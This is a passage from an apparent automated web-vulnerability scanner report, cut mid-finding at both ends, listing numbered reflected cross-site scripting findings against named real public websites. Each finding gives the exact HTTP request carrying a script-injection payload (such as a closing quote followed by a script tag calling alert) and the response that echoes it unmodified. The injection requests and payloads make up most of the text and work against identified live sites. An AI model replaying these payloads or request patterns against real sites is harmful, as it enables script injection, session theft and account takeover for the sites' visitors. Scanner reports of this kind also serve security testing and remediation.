User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pordeo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TR=pordeo; expires=Tue, 03-May-2011 10:55:45 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 22405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
   Po
...[SNIP]...
<b>94c4b<script>alert(1)</script>94ee537d775 </b>
...[SNIP]...

6.89. http://www.prosolutionpills.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prosolutionpills.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f3e6"-alert(1)-"58a8dd981ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico2f3e6"-alert(1)-"58a8dd981ee HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:20:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:20:10 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=0eea6ba9b5f95ddcb0241f0eac2a7a6d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:20:10 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:20:10 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29340

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<!--
s.pageName="www.prosolutionpills.com/favicon.ico2f3e6"-alert(1)-"58a8dd981ee"
s.server="www.prosolutionpills.com"
s.channel="World Niche"
s.prop7="www.prosolutionpills.com"
s.eVar1="N/A"
s.events=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_c
...[SNIP]...

6.90. http://www.prosolutionpills.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prosolutionpills.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df43"-alert(1)-"d4e4a0237a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?2df43"-alert(1)-"d4e4a0237a1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:19:59 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=dc467bb71902097ca9e3122fc19927cd; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:19:59 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:19:59 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29343

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<!--
s.pageName="www.prosolutionpills.com/favicon.ico?2df43"-alert(1)-"d4e4a0237a1=1"
s.server="www.prosolutionpills.com"
s.channel="World Niche"
s.prop7="www.prosolutionpills.com"
s.eVar1="N/A"
s.events=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s
...[SNIP]...

6.91. http://www.pusd.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pusd.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e662d<script>alert(1)</script>981d22cc7ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe662d<script>alert(1)</script>981d22cc7ba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pusd.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:23:05 GMT
Server: Apache
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 2797
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fe34b5953bf3ee77a7679654bb1fd7f0; path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.icoe662d<script>alert(1)</script>981d22cc7ba</div>
...[SNIP]...

6.92. http://www.reflector.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reflector.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fddf"><script>alert(1)</script>126035c3afe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6fddf"><script>alert(1)</script>126035c3afe HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reflector.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:23:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESS391af22a12335d38985f8e98d0435ca9=7863e333ea324158c8ecea1d13214430; expires=Thu, 26-May-2011 13:54:03 GMT; path=/; domain=.reflector.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:20:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 20783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<A href="/user/login?destination=favicon.ico6fddf"><script>alert(1)</script>126035c3afe">
...[SNIP]...

6.93. http://www.schneider.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.schneider.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5aad6<a%20b%3dc>16184a332c3 was submitted in the REST URL parameter 1. This input was echoed as 5aad6<a b=c>16184a332c3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico5aad6<a%20b%3dc>16184a332c3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schneider.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:22 GMT
Server: Apache/2.0.52 (Oracle)
Content-type: text/html; charset=UTF-8
Content-Length: 12617
Connection: close
Set-Cookie: BIGipServerpool_http_www=1396367009.30750.0000; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><meta http-equiv="Content
...[SNIP]...
<br/>
Error Message: Failed to locate document information for document with content ID 'favicon.ico5aad6<a b=c>16184a332c3'. The document is no longer in the system.<br/>
...[SNIP]...

6.94. http://www.sport-tube.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sport-tube.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2df6<script>alert(1)</script>d52a692c673 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof2df6<script>alert(1)</script>d52a692c673 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sport-tube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:47:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=916ce51099189b5098887df1bc172d87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 317

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.icof2df6<script>alert(1)</script>d52a692c673 was not found on this server.<P>
...[SNIP]...

6.95. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state-insurance-online.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a55'-alert(1)-'046e1e52bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico26a55'-alert(1)-'046e1e52bb8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.state-insurance-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:52:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=9eacc0d802f93d6461e0437462db0d2b; path=/; domain=.state-insurance-online.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<title>Get
...[SNIP]...
<![CDATA[ */
   try {
       var pageTracker = _gat._getTracker("UA-10767246-47");
       pageTracker._setDomainName('.state-insurance-online.com');
       pageTracker._trackPageview('/favicon.ico26a55'-alert(1)-'046e1e52bb8');
   }
   catch(err) {}
/* ]]>
...[SNIP]...

6.96. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state-insurance-online.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e4ea"><script>alert(1)</script>8c6310db10a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4e4ea"><script>alert(1)</script>8c6310db10a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.state-insurance-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=2a8d68cc828e341da9ecf51dc0fcde45; path=/; domain=.state-insurance-online.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<title>Get
...[SNIP]...
<link rel="canonical" href="http://www.state-insurance-online.com/favicon.ico4e4ea"><script>alert(1)</script>8c6310db10a" />
...[SNIP]...

6.97. http://www.straight.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.straight.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4497b"><script>alert(1)</script>962dbdb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4497b"><script>alert(1)</script>962dbdb4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417872"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<meta property="og:url" content="http://www.straight.com/favicon.ico4497b"><script>alert(1)</script>962dbdb4d" />
...[SNIP]...

6.98. http://www.thedailycat.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailycat.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61c4e'-alert(1)-'a729dccf86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /61c4e'-alert(1)-'a729dccf86e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailycat.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 24326
Date: Tue, 03 May 2011 11:17:31 GMT
X-Varnish: 862715183
Age: 0
Via: 1.1 varnish
Connection: keep-alive


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   
...[SNIP]...
<a href="http://www.thedailycat.com/61c4e'-alert(1)-'a729dccf86e/programsend/programsend.html" target="_blank">
...[SNIP]...

6.99. http://www.thomann.de/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thomann.de
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff79c"><a>32dbe0704d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoff79c"><a>32dbe0704d3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomann.de
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:36:06 GMT
Server: Apache/2.2.17
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>

<meta name="copyright" CONTENT="(c) 1996-2008 Musikhaus Thomann. Alle Rechte vorbehalten.">
<meta name="description" conte
...[SNIP]...
<input type="hidden" name="url" value="/favicon.icoff79c"><a>32dbe0704d3">
...[SNIP]...

6.100. http://www.tradearca.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradearca.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload afcaf<script>alert(1)</script>578bc22bc55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoafcaf<script>alert(1)</script>578bc22bc55 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:33:30 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40784
Content-Type: text/html
Expires: Mon, 02 May 2011 11:32:30 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=GEIHKEODIGCLFNFCNJINCHHK; path=/
Cache-control: False


<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<font color="red">http://www.tradearca.com/favicon.icoafcaf<script>alert(1)</script>578bc22bc55</font>
...[SNIP]...

6.101. http://www.tradearca.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradearca.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ace45<script>alert(1)</script>83d451f698a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?ace45<script>alert(1)</script>83d451f698a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:32:52 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40787
Content-Type: text/html
Expires: Mon, 02 May 2011 11:31:52 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=MBIHKEODKLODDOOAKIGOMOBG; path=/
Cache-control: False


<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<font color="red">http://www.tradearca.com/favicon.ico?ace45<script>alert(1)</script>83d451f698a=1</font>
...[SNIP]...

6.102. http://www.travelagentcentral.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelagentcentral.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c96af"><script>alert(1)</script>e9980385dab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc96af"><script>alert(1)</script>e9980385dab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelagentcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSb5663581135df8f6d7f3994b7ed7a15c=u8or7c4bpue562t1bohhqhksi0; expires=Thu, 26-May-2011 13:52:59 GMT; path=/; domain=.travelagentcentral.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:19:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
   
...[SNIP]...
<a rel="nofollow" onclick="                        window.open('http://www.travelagentcentral.com/favicon.icoc96af"><script>alert(1)</script>e9980385dab?print=1' ,'' ,'');" href="javascript:void(0)" class="print" rel="nofollow">
...[SNIP]...

6.103. http://www.travelagentcentral.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelagentcentral.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ef0"><script>alert(1)</script>004bb9d1fb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?a0ef0"><script>alert(1)</script>004bb9d1fb8=1 HTTP/1.1
